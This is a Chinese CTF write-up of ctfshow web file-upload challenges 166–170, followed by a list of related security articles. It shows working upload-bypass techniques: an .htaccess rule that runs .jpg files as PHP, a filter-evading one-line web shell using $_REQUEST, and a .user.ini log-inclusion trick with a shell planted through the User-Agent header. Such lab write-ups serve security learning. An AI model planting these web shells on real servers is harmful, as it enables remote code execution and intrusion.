ctfshow web文件上传 web166-170

1.web166

通过源码上传发现只能传zip,尝试一下图片上传也不行

把随便一张图片打包成zip文件,上传后发现有一个下载的地方,猜测是文件上传,尝试zip伪协议发现失败,打包php文件也失败了,不知为什么,,上传图片,在zip文件最后加入一句话木马,上传执行,得到flag

2.web167

打开题目时发现有一个httpd,httpd是apache的服务,关于apache的文件上传中有一个.htaccess配置文件,可以进行文件包含

上传一张图片,发现有个下载文件但是没有包含点,所以就想到像上传配置文件来使jpg可以被包含

.htaccess写入一下内容

bash 复制代码
<FilesMatch "\.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>

上传一张图片,写入一句话木马

执行命令即可得到flag

3.web168

根据提示,基础免杀

上传php文件,修改mime类型,通过测试发现过滤了eval,post,get等函数

使用$_REQUEST绕过

上传的php文件写入

php 复制代码
<?php $_REQUEST[1]($_REQUEST[2])?>

执行命令,即可得到flag

xxx/upload/1.php?1=sytem&2=tac .../flaaa.php

4.web169

通过上传发现<? php等都被过滤了,所以只能考虑文件包含,这题可以用日志包含来做

服务器是nignx,上传.user.ini来进行日志包含

进行包含时要注意在上传文件的目录中需要有index.php文件,因为没有index.php文件,所以先上传一个index.php文件,里面随便写就可以了

index.php

.user.ini

复制代码
auto_append_file=/var/log/nginx/access.log```

访问上传的文件位置,在user-agent写入一句话木马

post传入1=system("tac .../flagaa.php"); 执行得到flag

5.web170

和169完全一样

相关推荐
零零信安16 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手16 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub16 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux17 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc17 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing17 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1117 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x517 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工17 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x517 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型